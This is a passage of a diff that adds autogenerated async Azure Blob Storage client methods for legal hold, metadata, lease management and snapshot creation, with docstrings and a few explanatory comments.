timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> None: + """The Set Legal Hold operation sets a legal hold on the blob. + + :param legal_hold: Specifies whether a legal hold should be set on the blob. + :type legal_hold: bool + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword comp: comp. Default value is "legalhold". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "legalhold") # type: str + + + request = build_set_legal_hold_request( + url=self._config.url, + comp=comp, + version=self._config.version, + legal_hold=legal_hold, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.set_legal_hold.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_legal_hold.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_metadata( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Set Blob Metadata operation sets user-defined metadata for the specified blob as one or + more name-value pairs. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. 
+ :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "metadata". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "metadata") # type: str + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_set_metadata_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + metadata=metadata, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.set_metadata.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise 
HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_metadata.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def acquire_lease( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + duration: Optional[int] = None, + proposed_lease_id: Optional[str] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param duration: Specifies the duration of the lease, in seconds, or negative one (-1) for a + lease that never expires. A non-infinite lease can be between 15 and 60 seconds. A lease + duration cannot be changed using renew or change. Default value is None. + :type duration: int + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. Default value is None. + :type proposed_lease_id: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "acquire". Note that + overriding this default value may result in unsupported behavior. 
+ :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "acquire") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_acquire_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + timeout=timeout, + duration=duration, + proposed_lease_id=proposed_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.acquire_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + acquire_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def release_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. 
For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "release". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "release") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_release_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.release_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + 
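+ # Editor's note: acquire/renew/change/break/release are all the same comp=lease
+ # request distinguished by the `action` constant. A minimal lifecycle sketch via
+ # the public client (`conn_str` is a placeholder):
+ #
+ #     from azure.storage.blob.aio import BlobClient
+ #
+ #     async def lease_roundtrip() -> None:
+ #         async with BlobClient.from_connection_string(conn_str, "mycontainer", "blob.txt") as bc:
+ #             lease = await bc.acquire_lease(lease_duration=15)  # 15-60 s, or -1 for infinite
+ #             try:
+ #                 await bc.set_blob_metadata({"reviewed": "yes"}, lease=lease)
+ #             finally:
+ #                 await lease.release()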
release_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def renew_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "renew". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "renew") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_renew_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.renew_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + 
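+ # Editor's note: renewing resets the lease clock; per the service documentation a
+ # lease can be renewed with the same lease ID even after it has expired, provided
+ # the blob has not been leased again in the meantime.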
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + renew_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def change_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id: str, + proposed_lease_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. + :type proposed_lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "change". Note that + overriding this default value may result in unsupported behavior. 
+ :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "change") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_change_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + lease_id=lease_id, + proposed_lease_id=proposed_lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.change_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + change_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def break_lease( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + break_period: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. 
+ :type timeout: int + :param break_period: For a break operation, proposed duration the lease should continue before + it is broken, in seconds, between 0 and 60. This break period is only used if it is shorter + than the time remaining on the lease. If longer, the time remaining on the lease is used. A new + lease will not be available before the break period has expired, but the lease may be held for + longer than the break period. If this header does not appear with a break operation, a + fixed-duration lease breaks after the remaining lease period elapses, and an infinite lease + breaks immediately. Default value is None. + :type break_period: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "break". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "break") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_break_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + timeout=timeout, + break_period=break_period, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.break_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', 
response.headers.get('Last-Modified')) + response_headers['x-ms-lease-time']=self._deserialize('int', response.headers.get('x-ms-lease-time')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + break_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def create_snapshot( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + request_id_parameter: Optional[str] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Create Snapshot operation creates a read-only snapshot of a blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "snapshot". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "snapshot") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _lease_id = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_create_snapshot_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + metadata=metadata, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.create_snapshot.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-snapshot']=self._deserialize('str', response.headers.get('x-ms-snapshot')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', 
